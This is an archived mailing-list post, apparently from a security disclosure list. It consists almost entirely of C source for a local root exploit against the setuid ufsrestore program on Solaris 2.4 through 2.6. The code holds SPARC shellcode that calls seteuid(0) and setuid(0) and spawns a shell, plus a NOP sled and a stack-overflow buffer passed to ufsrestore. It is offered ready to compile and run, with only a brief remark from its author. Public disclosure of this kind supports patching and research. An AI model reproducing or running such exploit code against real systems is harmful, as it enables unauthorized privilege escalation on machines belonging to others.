ufsrestore sparc exploit

• Previous message: Joshua J. Drake: "Re: more named warez"
• Next in thread: Matt Glaves: "Re: ufsrestore sparc exploit"
• Reply: Matt Glaves: "Re: ufsrestore sparc exploit"
• Reply: Jesse Whyte: "Re: ufsrestore sparc exploit"
• Reply: John McDonald: "Re: ufsrestore sparc exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

well.. here is the source. :>

I have not checked it on a patched machine.. guess I stumbled onto a
different hole when playing with ufsrestore.

humble

// ufsrestore solaris 2.4, 2.5, 2.5.1, 2.6 exploit
// by humble
// thanks to plaguez for help

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 300
#define EXTRA 100
#define STACK_OFFSET -600
#define SPARC_NOP 0xac15a16e

// normal shell code cept I added a bunch of sll's and add's
// to get rid of a 2f '/' in there (from the sethi 0xbdcda, %l7)
// I don't know sparc assembly so this might be dumb :P

// also added code to do seteuid(0); setuid(0); from erik's buffer
// overrun page

u_char sparc_shellcode[] =
"\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
   "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
   "\xae\x10\x2b\xdc\xaf\x2d\xe0\x01\xae\x05\xe0\x01"
   "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
   "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
   "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x01"
   "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x0a"
   "\x90\x0b\x80\x0e"
   "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
   "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
   "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

   u_long get_sp(void)
   {
   __asm__("mov %sp,%i0 \n");
   }

   void main(int argc, char *argv[])
   {
   char buf[BUF_LENGTH + EXTRA + 8];
   long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(sparc_shellcode),dso=0,a=0;

   if(argc > 1) dso=atoi(argv[1]);

   long_p =(u_long *) buf ;
   targ_addr = get_sp() - STACK_OFFSET - dso;
   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
   *long_p++ = SPARC_NOP;

   char_p = (u_char *) long_p;

   for (i = 0; i < code_length; i++)
   *char_p++ = sparc_shellcode[i];

   long_p = (u_long *) char_p;

   for (i = 0; i < EXTRA / sizeof(u_long); i++)
   *long_p++ =targ_addr;

   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
   printf("hit ctrl-c and then type y\n");
   execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0);
   perror("execl failed");
   }

• Next message: Steve Siirila: "Re: Solaris 2.5.1 patch not effective?"
• Previous message: Joshua J. Drake: "Re: more named warez"
• Next in thread: Matt Glaves: "Re: ufsrestore sparc exploit"
• Reply: Matt Glaves: "Re: ufsrestore sparc exploit"
• Reply: Jesse Whyte: "Re: ufsrestore sparc exploit"
• Reply: John McDonald: "Re: ufsrestore sparc exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:57:26 PDT